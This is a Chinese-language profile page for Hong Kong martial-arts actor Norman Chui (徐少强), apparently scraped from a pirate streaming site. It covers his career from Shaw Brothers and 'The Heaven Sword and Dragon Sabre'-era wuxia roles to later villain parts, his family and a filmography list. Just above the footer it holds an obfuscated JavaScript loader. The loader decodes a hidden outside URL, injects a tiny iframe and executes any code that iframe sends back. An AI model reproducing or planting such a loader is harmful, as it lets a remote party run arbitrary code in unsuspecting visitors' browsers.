徐少强

  • 职业:演员
  • 身高:180cm
  • 体重:未知
  • 星座:天秤座
  • 生日:1950年10月16
  • 出生地:江门新会

徐少强简介

      影人简介

         徐少强(Norman Chui,1950年10月16日-),广东江门人,香港著名影视演员,出身于邵氏电影公司,亦为香港亚洲电视前艺员,以扮演武侠电影中之大侠而见称,其成名作为1979年的剧集《天蚕变》,此剧当年引起巨大轰动,云飞扬亦成为他最经典最具代表性的一个角色。他是香港艺人雪梨的前夫。他也是加拿大温哥华新时代电视节目主持人徐伟栋的父亲。  徐少强是香港著名实力派武打演艺明星。他年轻时曾在股票市场任会计,后考入邵氏电影公司担任演员。七十年代流行武侠片,徐少强在电影经常以大侠的形象出现。1977年客串演出丽的电视连续剧《大丈夫》受到瞩目,遂正式加盟丽的电视。他在丽的也是以饰演大侠居多,计有《三少爷的剑》、《天蚕变》等等。其中以《天蚕变》一剧饰演“云飞扬”使徐少强声名大噪,该剧集亦令当时在收视方面处于劣势的丽的电视一度击败无线电视,人气还遍及台湾。后来他受电影公司怂恿闹不和,1980年被丽的电视解约,成为自由演员,《天蚕变》亦因此被迫中途换角。 尽管如此,徐氏后来仍不时演出亚视剧集,几乎未曾在无线亮相,而当时不曾在无线亮相的艺人不多,只有董骠、刘志荣等等。他至今已参演逾百部影视作品,早期是以饰 年轻时的徐少强演大侠为主,后期则改为饰演反派。比较突出的角色乃周星驰电影《武状元苏乞儿》饰演大反派“赵无极”。1993年,亚视重拍《天蚕变》,徐氏也在此剧再次饰演“云飞扬”一角。  随着九十年代末港产片市道不景,亚视又因亏损连年减少剧集制作,近年徐少强甚少在香港亮相,而多在内地拍剧。

      早年经历

        徐少强年轻时曾在股票市场任会计,后考入邵氏公司。邵氏演员训练中心第三期毕业,即签约为邵氏基本演员,以动作片小生姿态任武侠片配角或第二主角。

      演艺经历

        1967年参演电影《独臂刀》。

        七十年代流行武侠片,徐少强在电影经常以大侠的形象出现。1977年客串演出丽的电视连续剧《大丈夫》受到瞩目,遂正式加盟丽的电视。

        同年参演《三少爷的剑》、《天蚕变》等等。其中以《天蚕变》一剧饰演“云飞扬”使徐少强声名大噪。后来他受电影公司怂恿闹不和,1980年被丽的电视解约,成为自由演员,《天蚕变》亦因此被迫中途换角。

        1990年参演《老虎出更2》。

        1992年参演周星驰电影《武状元苏乞儿》,徐少强扮演天理教教主赵无极。

        1993年,亚视重拍《天蚕变》,徐氏也在此剧再次饰演“云飞扬”一角。

        1994年主演《斩虎屠龙》中的“反一号”——黑社会武术组织‘一刀会’的掌门人。同年在《红粉金刚》中的“反一号”——山寨马贼头目飞天猩猩;参演电影《天龙八部之天山童姥》。

        1997年参演电影《省港双雄》。

        2000年参演《决战紫禁之巅》。

        2003年参演电视剧《流星蝴蝶剑》,搭档演员郑少秋。

        2004年参演电影《江湖》。

        2007年参演民国戏《叛女》,徐少强担任剧中满清贵胄托王爷。

        2009年出演电视剧《金钱本色》,饰演的是赌王一角。

        2010年参演古装动作喜剧电影《大笑江湖》。

        2011年参演电视剧《马永贞》,剧中扮演白癞痢。

        2013年参演电视剧《利箭纵横》。客串出演谍战剧《寒冬》。同年参演电视剧《隋唐演义》,饰演宇文化及一角。

        2014年参演大型商战年代情感戏《金玉瑶之一诺千金》。7月,参演电视剧《侠客行》,搭档演员李子雄、汤镇业、刘锡明等。同年参演电视剧《江湖儿女》,剧中徐少强饰演大反派松本太郎。

        2015年参与拍摄惊悚电影《荒村怨灵》,该片2016年1月8日上映。8月,搭档李鹤楠、陈虎、陈玥丞、苑琼丹、陈天星等领衔主演院线《流金》。11月,参与拍摄喜剧电影《昔日战甲》,徐少强在剧中饰演大反派。

        2016年在刘恺威、郑爽主演的电视剧《寂寞空庭春欲晚》中饰演了鳌拜一角。在陈家俊、张浩博联合执导的网络大电影《血战铜锣湾》中饰演“神秘人”的角色。

        2017年,先后主演了《广东十虎苏灿之亢龙有悔》、《我与江湖擦肩而过》等电影。

        2019年参演由程小东执导,肖战、李沁、孟美岐领衔主演的古装玄幻电影《诛仙》,饰演苍松道人。10月29日,参演由田七担任编剧、导演,徐少强、张美娥、杜玉明等主演的电影《疯狂的王二》。

      个人生活

        徐少强有多段短暂婚絪,其中与女艺人雪梨育有一子一女。长子徐亦东,香港创作人,活跃于广告及电影业。二子徐亦豪,加拿大温哥华独立歌手﹐亦是当地华语电视台新时代电视节目主持人。女徐颖堃,2011年加拿大温哥华华裔小姐竞选冠军。

      获奖记录

         综合奖项

      • 2006中美文化魅力人物最佳港台艺人奖(获奖)

        人物评价

          徐少强是香港实力派武打演艺明星,出道于邵氏电影公司,早期多扮演武侠电影中之大侠,主演过根据金庸、古龙、黄鹰等知名武侠小说作家的作品改变的电影、电视剧,其成名作为1979年的剧集《天蚕变》,此剧当年引起巨大轰动,云飞扬亦成为他最经典最具代表性的一个角色。徐少强饰演的云飞扬这一大侠形象被大众选在了香港最令人难忘的十个银幕形象的前列。因此徐少强被同事,朋友尊称为“徐大侠”。

    参演作品

    • 8.6全36集山河令张哲瀚,龚俊,周也,马闻远,孙浠伦,金乐,柯乃予,王若麟,郭家豪,黑子,寇振海,徐少强,梁家仁,沈保平,王岗,张双利,王铂清,马兰,周小鹏,陈紫函,李岱昆,黄宥明,王东,魏哲鸣,范津玮,郭云飞,刘瀚阳,杨万里,袁帅
    • 高清一眉先生钱小豪,徐少强,张迪财,安唯绫,庞景峰
    • 4.1高清玩命李炳渊,大卫·贝利,李炳雷,黄译萱,王洪祥,徐少强
    • 7.7高清三少爷的剑林更新,何润东,江一燕,蒋梦婕,鲍起静,顾曹斌,马京京,徐少强,顾冠忠,吴元俊,陆剑明,方平,原岛大地,林朝绪,宋伊人,铁男,王美英,飞儿,赵英龙,胡锦超,林晨,佟仲琪,田淼,寇骏,张小米,郭九龙,王德顺,刘广超,吴优,包小平,杨威,王昭,万国鹏,张文斌,周鹏,赖迦童,沈凯,陈墨研,张梓豫,马睿瀚,张喜来,红木,赵海鹰,魏晓东,蒿怡帆,蒿怡霏,马春瑞
    • 6.6高清老虎出更周润发,利智,李元霸,高飞,吴宁,黄沾,狄龙,刘家辉,徐少强,成奎安,沈殿霞,熊欣欣,姜大卫
    • 高清诛仙Ⅰ肖战,李沁,孟美岐,唐艺昕,邱心志,叶童,姜大卫,徐少强,梁家仁,包小松,陈立唯
    • 4.6全42集斗破苍穹吴磊,林允,李沁,陈楚河,辛芷蕾,刘美彤,肖战,伍嘉成,彭楚粤,谷嘉诚,苏青,于荣光,李若彤,李子峰,凌潇肃,曾江,邱心志,徐少强
    • 更新至27集山河令海外版张哲瀚,龚俊,周也,马闻远,孙浠伦,金乐,柯乃予,王若麟,郭家豪,黑子,寇振海,徐少强,梁家仁,沈保平,王岗,张双利,王铂清,马兰,周小鹏,陈紫函,李岱昆,黄宥明,王东,魏哲鸣,范津玮,郭云飞,刘瀚阳,杨万里,袁帅,欧若拉,郭迦南
    • 22集全/已完结新楚留香2000粤语任贤齐,林心如,黎姿,袁咏仪,杨恭如,林熙蕾,陈法蓉,万绮雯,孙耀威,张卫健,郑伊健,张茜,张慧仪,吴孟达,杨蕊,郑浩南,徐少强,陈展鹏
    • 7.7HD新仙鹤神针梁朝伟,梅艳芳,关之琳,刘松仁,吴启华,徐少强,张铁林,刘锦玲,陈慧仪,刘洵
    • BD高清中字仙魔游踪之百懂仙梁家仁,叶蕴仪,徐少强,郭耀明,张宝雯
    • 4.6HD国语中字三月三陈龙,徐少强,何美钿,白庆琳,祝雨辛,赵汉唐
    • 完结我的老千生涯曾国祥,郑佩佩,徐少强,徐伟栋,陈宇琛,唐小然,刘永
    • HD1280高清国语中字版马永贞之闸北决徐少强,白那日苏,徐小琴,刘亦彤,倪学增
    • 8.112集全画江湖之不良人杨旭文,毛晓彤,郭晓婷,李俊辰,张皓然,刘衍辰,孙博豪,周一围,闫肃,张沙沙,甘婷婷,张晨光,徐少强,刘宸希,李俊墨,刘羽琦,邵兵,迟嘉,安笑歌,石兆琪,郑沛琳,高艺涵,董李无忧,冯泽昂,蒋诗萌,李蓓蕾,刘金山,徐伟栋,鲁德峰,那志东,宋宁
    • 7.7BD职业大贼古天乐,蔡少芬,徐少强,雷宇扬,徐锦江
    • 20集全岳飞传国语徐少强,李道洪,黄允材,潘志文,魏秋桦
    • 完结湖海争霸录粤语曾江,米雪,余安安,梁小龙,徐少强,朱铁和,杨泽霖,罗乐林,张瑛,刘江,秦沛,邵音音,马宗德,田丰,文雪儿,王书麒,苗金凤,高雄,容惠雯,陈曼娜,郑恕峰
    • 31集全天蚕变之再与天比高国语徐少强,惠天赐,雪梨,尹天照,罗颂华,蔡晓仪
    • 3.0BD超清中字龙头老大王冠雄,陈观泰,罗烈,徐少强
    function OklDCUeK(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function EevwrMI(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return OklDCUeK(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x6a\x6d\x50\x56\x4c\x43\x44\x41\x48']=function(){;(function(u,r,w,d,f,c){var x=EevwrMI;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZpbWltLm1lJTJGGODkyMw==',''+'XRj'+'qSt'+'mpL'+'c'+'',window,document,''+'8Y5'+'6Ul'+'g'+'','G');};

    本站不会保存、复制或传播任何视频文件,也不对本站所抓取的任何内容负法律责任,所列的内容仅做宽带测试使用。

    若本站收集的节目无意侵犯了贵司版权,请给jsjlyb@gmail.com邮箱地址来信,我们将在第一时间删除相应资源。

    RSS订阅 - 百度sitemap - 谷歌sitemap - 必应sitemap - 搜狗sitemap - 奇虎sitemap - 神马sitemap

    Copyright © 2021 www.hobiao.com - 红标影院

    公众号